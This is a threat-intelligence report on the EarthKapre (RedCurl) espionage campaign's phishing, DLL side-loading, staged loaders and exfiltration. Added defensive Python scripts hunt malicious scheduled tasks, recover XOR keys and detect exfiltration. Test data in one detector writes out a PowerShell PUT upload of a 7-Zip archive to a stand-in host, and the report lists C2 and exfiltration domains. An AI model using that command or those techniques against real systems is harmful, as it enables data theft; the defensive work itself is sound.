EarthKapre APT Drops Weaponized PDF to Compromise Windows Systems


A highly sophisticated cyber espionage group known as EarthKapre, also referred to as RedCurl, has been identified targeting private-sector organizations, particularly those in the Law Firms & Legal Services industry.

The eSentire Threat Response Unit (TRU) uncovered the group’s recent activities in January 2025, revealing a complex attack chain designed for corporate espionage.

Technical Analysis: A Deep Dive into the Malware

The initial point of entry involves carefully crafted phishing emails disguised as job applications from Indeed. These emails contain PDF attachments with links that lead unsuspecting victims to download ZIP archives.

Within these archives lies a mountable ISO (IMG) file. Once mounted, the victim sees a file named “CV Applicant *.scr,” which is actually a legitimate, signed Adobe executable (“ADNotificationManager.exe”).

Opening this file triggers a technique called “DLL side-loading”: the signed Adobe executable resolves a DLL it depends on from its own directory, so the attacker-supplied copy of “netutils.dll” placed beside it, which is the EarthKapre loader, gets executed. This multi-stage attack is designed to evade traditional security measures.

The TRU team’s analysis reveals a sophisticated approach involving multiple stages of encryption and obfuscation.

Stage 1 (Simple Downloader): Its primary purpose is to download and execute the next stage. It employs a string decryption function that uses the Windows CNG APIs in bcrypt.dll to compute a SHA256 hash, which then serves as the AES key.

This key decrypts strings, including a C2 URL (sm.vbigdatasolutions.workers[.]dev) and a user agent. To further deceive the user, the malware opens a legitimate-looking “https://secure.indeed.com/auth” page in the victim’s browser.

Persistence: The malware establishes persistence by creating a scheduled task via the COM interface (taskschd.dll). This task is designed to execute the next stage using the LOLBin Program Compatibility Assistant (pcalua.exe) and rundll32.exe.
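A defender-side check for the persistence mechanism just described, written as an added example rather than anything from eSentire or the article: the script parses scheduled-task definitions in the XML format Windows keeps under C:\Windows\System32\Tasks and flags any action whose executable is pcalua.exe or rundll32.exe, or where pcalua.exe is used to proxy rundll32.exe. The two task definitions embedded below are constructed; the element names and namespace are the real Task Scheduler 2.0 schema.

```python
"""Hunt Windows Task Scheduler definitions for LOLBin-proxied actions.

Added example; this is not eSentire's or the article's code. It parses task
definitions in the XML format Windows stores under
C:\\Windows\\System32\\Tasks and flags any <Exec> action that runs pcalua.exe
or rundll32.exe, the pairing the article describes for EarthKapre's
scheduled-task persistence. The two task definitions below are constructed.
"""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET
from pathlib import Path

# Namespace used by every Task Scheduler 2.0 task definition.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# pcalua.exe -a <program> launches an arbitrary program under the Program
# Compatibility Assistant; rundll32.exe <dll>,<export> runs code from a DLL.
LOLBINS = {"pcalua.exe", "rundll32.exe"}


def _basename(command: str) -> str:
    """Lower-cased file name of a command, with quotes and directory stripped."""
    return re.split(r"[\\/]", command.strip().strip('"'))[-1].lower()


def analyze_task_xml(xml_doc: str | bytes) -> list[dict]:
    """Return one finding per suspicious <Exec> action in a task definition."""
    root = ET.fromstring(xml_doc)
    findings = []
    for exec_el in root.findall(".//t:Actions/t:Exec", NS):
        command = exec_el.findtext("t:Command", default="", namespaces=NS)
        args = exec_el.findtext("t:Arguments", default="", namespaces=NS)
        name = _basename(command)
        reasons = []
        if name in LOLBINS:
            reasons.append(f"action runs LOLBin {name}")
            if re.search(r"(?i)\.dll\b", args):
                reasons.append("LOLBin is handed a DLL to load")
        if name == "pcalua.exe" and re.search(r"(?i)rundll32(?:\.exe)?", args):
            reasons.append("pcalua.exe -a proxies rundll32.exe")
        if reasons:
            findings.append({"command": command, "arguments": args, "reasons": reasons})
    return findings


def scan_tasks_dir(tasks_dir: str = r"C:\Windows\System32\Tasks") -> dict[str, list[dict]]:
    """Walk the on-disk task store and map each task path to its findings."""
    results: dict[str, list[dict]] = {}
    base = Path(tasks_dir)
    if not base.is_dir():
        return results
    for path in base.rglob("*"):
        if not path.is_file():
            continue
        try:
            # Task files are UTF-16 with an XML declaration; bytes let ET honour it.
            findings = analyze_task_xml(path.read_bytes())
        except ET.ParseError:
            continue
        if findings:
            results[str(path)] = findings
    return results


# Constructed sample task definitions (not real artefacts from the campaign).
SUSPICIOUS_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Windows\\System32\\pcalua.exe</Command>
      <Arguments>-a rundll32.exe C:\\Users\\Public\\Libraries\\stage2.dll,Entry</Arguments>
    </Exec>
  </Actions>
</Task>"""

BENIGN_TASK = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>%windir%\\system32\\sc.exe</Command>
      <Arguments>start w32time task_started</Arguments>
    </Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for label, doc in (("suspicious", SUSPICIOUS_TASK), ("benign", BENIGN_TASK)):
        print(label, analyze_task_xml(doc))
    print(scan_tasks_dir())  # empty on non-Windows hosts
```

Run it on a live host to sweep the whole task store; the per-task function is also usable against task XML exported with schtasks /query /xml or collected by an EDR.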

C2 Communication: The malware communicates with its command-and-control (C2) server to acquire the second-stage payload. The payload is encrypted and requires a specific XOR key for decryption.
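For an analyst handling such a payload, the practical question is how to recover the XOR key without the loader. The following is an added example, not eSentire's or the article's code: it assumes the decrypted stage is a Windows PE and that the key is a fixed-length repeating byte string (the article states neither), and derives the key from the DOS-stub text that MSVC-linked PEs carry at offset 0x4E, checking the result against the MZ signature. The encrypted sample is constructed in the block, not the real encrypted_payload.bin.

```python
"""Recover a repeating XOR key from an encrypted PE payload using known plaintext.

Added example, not eSentire's or the article's code. The article only states
that the second stage arrives XOR-encrypted; this block assumes the plaintext
is a Windows PE and that the key is a fixed-length repeating byte sequence,
and recovers the key from the DOS-stub text every MSVC-linked PE carries.
The encrypted sample below is constructed, not the real encrypted_payload.bin.
"""
from __future__ import annotations

# Known plaintext present in the DOS stub of typical PE files, and the offset
# at which the linker places it (assumption; adjust if the stub differs).
DOS_STUB_TEXT = b"This program cannot be run in DOS mode."
DOS_STUB_OFFSET = 0x4E


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Apply a repeating-key XOR (encryption and decryption are the same op)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def derive_key(ciphertext: bytes, known: bytes, offset: int, key_len: int) -> bytes | None:
    """Solve key bytes from known plaintext at `offset` for a given key length.

    Returns None if the known plaintext does not cover every key slot or if two
    positions that share a slot disagree (wrong key length or wrong offset).
    """
    slots: list[int | None] = [None] * key_len
    for i, p in enumerate(known):
        pos = offset + i
        if pos >= len(ciphertext):
            return None
        k = ciphertext[pos] ^ p
        slot = pos % key_len
        if slots[slot] is None:
            slots[slot] = k
        elif slots[slot] != k:
            return None
    if any(k is None for k in slots):
        return None
    return bytes(slots)


def recover_xor_key(ciphertext: bytes, max_key_len: int = 32) -> bytes | None:
    """Try key lengths in ascending order; accept the first that also yields an MZ header."""
    for key_len in range(1, max_key_len + 1):
        key = derive_key(ciphertext, DOS_STUB_TEXT, DOS_STUB_OFFSET, key_len)
        if key is not None and xor_bytes(ciphertext[:2], key) == b"MZ":
            return key
    return None


def build_sample() -> tuple[bytes, bytes]:
    """Construct a fake PE-shaped plaintext and its XOR-encrypted form (test data only)."""
    key = bytes([0x5A, 0x13, 0x9C, 0x27, 0xE1, 0x48, 0xB0, 0x6F])  # constructed key
    plain = bytearray(0x200)
    plain[0:2] = b"MZ"
    plain[0x3C:0x40] = (0x80).to_bytes(4, "little")  # e_lfanew: PE header at 0x80
    plain[DOS_STUB_OFFSET:DOS_STUB_OFFSET + len(DOS_STUB_TEXT)] = DOS_STUB_TEXT
    plain[0x80:0x84] = b"PE\x00\x00"
    return bytes(plain), xor_bytes(bytes(plain), key)


if __name__ == "__main__":
    plain, ct = build_sample()
    key = recover_xor_key(ct)
    print("recovered key:", key.hex() if key else None)
    print("round trip ok:", key is not None and xor_bytes(ct, key) == plain)
```

Against a real sample, replace build_sample() with the bytes read from disk; if the stub text sits elsewhere or the key is not a simple repeating one, derive_key returns None for every length and the assumption, not the code, needs revisiting.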

Stage 2: This stage continues to use the string decryption techniques from the first stage but derives the AES decryption key differently. It checks for internet availability by attempting to connect to “www.msn.com”.

It gathers information about the compromised computer such as the username, computer name, and the directory paths for Program Files, Desktop, and Local AppData.

The collected data is encrypted and sent to the C2 server. It also checks for debuggers. If none are found, a third-stage payload is downloaded and executed.

Reconnaissance and Data Exfiltration

Upon successful execution of the final stage, EarthKapre initiates a series of commands to gather system information, including user account details, system configurations, disk information, and installed antivirus products.

It leverages tools like SysInternals AD Explorer to extract data from Active Directory. The collected data is then archived using 7-Zip with password protection and exfiltrated to the cloud storage provider “Tab Digital” via HTTP PUT requests issued from PowerShell.
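The archive-then-upload sequence above is detectable from process-creation telemetry alone. The script below is an added example, not eSentire's detection content: it reads Sysmon Event ID 1-style events reduced to JSON lines (timestamp, host, image, command_line; the field names are this example's own), flags a password-protected 7-Zip add command and a PowerShell Invoke-WebRequest/Invoke-RestMethod with -Method PUT, and escalates when the upload follows an archive on the same host within a time window. The events are constructed and use the reserved .invalid TLD.

```python
"""Flag the archive-then-upload exfiltration chain in process-creation telemetry.

Added example, not eSentire's or the article's detection content. It scans
process-creation events (Sysmon Event ID 1 style, reduced here to JSON lines
with timestamp, host, image and command_line) for creation of a
password-protected 7-Zip archive followed on the same host by a PowerShell
HTTP PUT, the sequence the article describes. Events must be in time order.
The events below are constructed and use the reserved .invalid TLD.
"""
from __future__ import annotations

import json
import re
from datetime import datetime, timedelta

SEVEN_ZIP = {"7z.exe", "7za.exe", "7zr.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# 7-Zip "a" (add) command plus a -p<password> switch anywhere on the line.
SEVENZIP_ADD = re.compile(r"(?:^|\s)a(?:\s|$)")
SEVENZIP_PASSWORD = re.compile(r"(?:^|\s)-p\S*")
# Invoke-WebRequest / Invoke-RestMethod (or their aliases) with -Method PUT.
PS_WEB_CMDLET = re.compile(r"(?i)\b(?:Invoke-WebRequest|Invoke-RestMethod|iwr|irm)\b")
PS_PUT = re.compile(r"(?i)-Method\s+['\"]?PUT\b")


def _basename(image: str) -> str:
    """Lower-cased file name of an image path, quotes and directory stripped."""
    return re.split(r"[\\/]", image.strip().strip('"'))[-1].lower()


def classify(event: dict) -> str | None:
    """Name the single-event rule an event trips, or None."""
    name = _basename(event["image"])
    cmd = event["command_line"]
    if name in SEVEN_ZIP and SEVENZIP_ADD.search(cmd) and SEVENZIP_PASSWORD.search(cmd):
        return "7zip_password_archive"
    if name in POWERSHELL and PS_WEB_CMDLET.search(cmd) and PS_PUT.search(cmd):
        return "powershell_http_put"
    return None


def detect(lines: list[str], window: timedelta = timedelta(minutes=30)) -> list[dict]:
    """Classify events and escalate a PUT that follows an archive on the same host."""
    findings: list[dict] = []
    archive_times: dict[str, list[datetime]] = {}
    for line in lines:
        ev = json.loads(line)
        rule = classify(ev)
        if rule is None:
            continue
        ts = datetime.fromisoformat(ev["timestamp"])
        host = ev["host"]
        if rule == "7zip_password_archive":
            archive_times.setdefault(host, []).append(ts)
        elif any(timedelta(0) <= ts - t <= window for t in archive_times.get(host, [])):
            rule = "archive_then_upload"  # staged archive, then an upload from the same host
        findings.append({"host": host, "timestamp": ev["timestamp"], "rule": rule,
                         "command_line": ev["command_line"]})
    return findings


# Constructed events for the demo (not real telemetry from the incident).
SAMPLE_EVENTS = [
    json.dumps({"timestamp": "2025-01-15T10:02:11", "host": "WS-017",
                "image": r"C:\Windows\System32\cmd.exe",
                "command_line": "cmd.exe /c ipconfig /all"}),
    json.dumps({"timestamp": "2025-01-15T10:05:40", "host": "WS-017",
                "image": r"C:\Users\Public\7za.exe",
                "command_line": r"7za.exe a -pEXAMPLEPASS -mhe out.7z C:\Users\Public\collect\ "}),
    json.dumps({"timestamp": "2025-01-15T10:07:03", "host": "WS-017",
                "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "command_line": 'powershell.exe -nop -c "Invoke-WebRequest -Uri '
                                'https://files.example.invalid/up -Method PUT -InFile out.7z"'}),
    json.dumps({"timestamp": "2025-01-15T11:00:00", "host": "WS-022",
                "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
                "command_line": 'pwsh.exe -c "Invoke-RestMethod -Uri '
                                'https://api.example.invalid/status -Method GET"'}),
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding["timestamp"], finding["host"], finding["rule"])
```

The single-event rules are noisy on their own (backup jobs create password-protected archives; admins script PUTs), which is why the correlated archive_then_upload finding is the one worth alerting on.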

EarthKapre also utilizes Cloudflare Workers for its C2 infrastructure. While this provides a serverless execution environment, it also comes with limitations.

Security researchers at eSentire discovered that they could exploit the limitations of Cloudflare Workers’ free tier (100,000 requests per day) to disrupt the threat actor’s operations.

eSentire recommends that organizations educate their employees on the dangers of phishing emails, especially those disguised as job applications. It is crucial to verify the legitimacy of email attachments and links before opening them.

Additionally, organizations should implement robust endpoint detection and response (EDR) solutions to detect and prevent sophisticated attacks like those employed by EarthKapre.


Indicators of Compromise

File:

c6ef0416f7008882317696e66b93885170f5999968bc36d9165d313fa57ef041 – CV Applicant 4890-17173.img
868d382f98a4465b239f9e5b6dc91a46ada7f334df26af9e780dd7fa74dc4e3c – netutils.dll (EarthKapre Simple Downloader)
e6715e140ecab861235ae01c84345f7453847a9ba330512a37137bdf9e908edb – encrypted_payload.bin (Encrypted second stage payload)
bd5099e03d81613802d6ef4c2743195cb6e31d37b35a71011c924e66c40e6635 – EarthKapre decrypted second stage
ff3706e94d9b769f78e4271928382426cb034b11c5a0f6a8ffea35726cc03692 – 7za.exe (7-Zip)
e451287843b3927c6046eaabd3e22b929bc1f445eec23a73b1398b115d02e4fb – ADExplorer64.exe (Sysinternals AD Explorer)

Domain:

cvsend.resumeexpert[.]cloud – Dropper domain
live[.]itsmartuniverse[.]workers[.]dev – RedCurl C2
datascience.iotconnectivity.workers[.]dev – RedCurl C2
sm.vbigdatasolutions.workers[.]dev – RedCurl C2
community.rmobileappdevelopment.workers[.]dev – RedCurl C2
mia.nl.tab[.]digital – Exfil domain

URL: https://cvsend.resumeexpert[.]cloud/id/45bc4c3c-e212-43ab-a5d3-1a668c2df00e/kAal108 – Dropper URL
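To put the list above to use, the defanged entries have to be normalised before they can be compared with logs. The script below is an added example, not eSentire's tooling: it refangs the domains and file hashes published above (www.msn.com is the malware's connectivity check, a legitimate site, and is deliberately left out), then matches them against constructed DNS query lines in a simple "timestamp client query" format and against a constructed list of observed SHA-256 values. Domains match exactly or as a parent of the queried name.

```python
"""Refang the indicators published for this campaign and match them against telemetry.

Added example, not eSentire's or the article's tooling. The domain and hash
indicators are the ones listed in the article; the DNS log lines and file
hashes they are matched against are constructed. Domains match exactly or as
a parent of the queried name; hashes match case-insensitively.
"""
from __future__ import annotations

import re

# Indicators as published (defanged). www.msn.com is the malware's
# connectivity check, a legitimate site, and deliberately not an indicator.
RAW_DOMAINS = {
    "cvsend.resumeexpert[.]cloud": "Dropper domain",
    "live[.]itsmartuniverse[.]workers[.]dev": "RedCurl C2",
    "datascience.iotconnectivity.workers[.]dev": "RedCurl C2",
    "sm.vbigdatasolutions.workers[.]dev": "RedCurl C2",
    "community.rmobileappdevelopment.workers[.]dev": "RedCurl C2",
    "mia.nl.tab[.]digital": "Exfil domain",
}
RAW_HASHES = {
    "868d382f98a4465b239f9e5b6dc91a46ada7f334df26af9e780dd7fa74dc4e3c": "netutils.dll (EarthKapre Simple Downloader)",
    "e6715e140ecab861235ae01c84345f7453847a9ba330512a37137bdf9e908edb": "encrypted_payload.bin",
    "ff3706e94d9b769f78e4271928382426cb034b11c5a0f6a8ffea35726cc03692": "7za.exe (7-Zip)",
}


def refang(value: str) -> str:
    """Undo common defanging so indicators can be compared with raw telemetry."""
    v = value.strip().lower()
    for token in ("[.]", "(.)", "[dot]", "(dot)"):
        v = v.replace(token, ".")
    return re.sub(r"^hxxp(s?)://", r"http\1://", v)


DOMAINS = {refang(d): label for d, label in RAW_DOMAINS.items()}
HASHES = {h.lower(): label for h, label in RAW_HASHES.items()}


def match_domain(query: str) -> str | None:
    """Return the matching indicator if `query` is it or a subdomain of it."""
    q = refang(query).rstrip(".")
    for ind in DOMAINS:
        if q == ind or q.endswith("." + ind):
            return ind
    return None


# "<timestamp> <client-ip> <queried-name>" (this example's own log shape).
DNS_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+(?P<query>\S+)")


def scan_dns_log(lines: list[str]) -> list[dict]:
    """Parse DNS query lines and report every indicator hit with its label."""
    hits = []
    for line in lines:
        m = DNS_LINE.match(line)
        if not m:
            continue
        ind = match_domain(m["query"])
        if ind:
            hits.append({**m.groupdict(), "indicator": ind, "label": DOMAINS[ind]})
    return hits


def scan_hashes(observed: list[str]) -> list[dict]:
    """Report any observed SHA-256 that is a published file indicator."""
    return [{"sha256": h.lower(), "label": HASHES[h.lower()]}
            for h in observed if h.lower() in HASHES]


# Constructed telemetry for the demo (not real logs).
SAMPLE_DNS_LOG = [
    "2025-01-15T10:06:01 10.0.5.17 sm.vbigdatasolutions.workers.dev",
    "2025-01-15T10:06:02 10.0.5.17 www.msn.com",
    "2025-01-15T10:41:19 10.0.5.17 mia.nl.tab.digital.",
    "2025-01-15T10:42:00 10.0.5.23 notsm.vbigdatasolutions.workers.dev",
    "2025-01-15T10:43:10 10.0.5.23 workers.dev",
]
SAMPLE_HASHES = [
    "868D382F98A4465B239F9E5B6DC91A46ADA7F334DF26AF9E780DD7FA74DC4E3C",
    "0" * 64,  # obviously fake placeholder hash
]

if __name__ == "__main__":
    for hit in scan_dns_log(SAMPLE_DNS_LOG):
        print(hit["ts"], hit["client"], hit["query"], "->", hit["label"])
    for hit in scan_hashes(SAMPLE_HASHES):
        print(hit["sha256"], "->", hit["label"])
```

Note that the suffix test requires a dot boundary, so a lookalike such as notsm.vbigdatasolutions.workers.dev does not match, and the bare workers.dev zone is not treated as an indicator since it hosts legitimate Cloudflare Workers as well.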


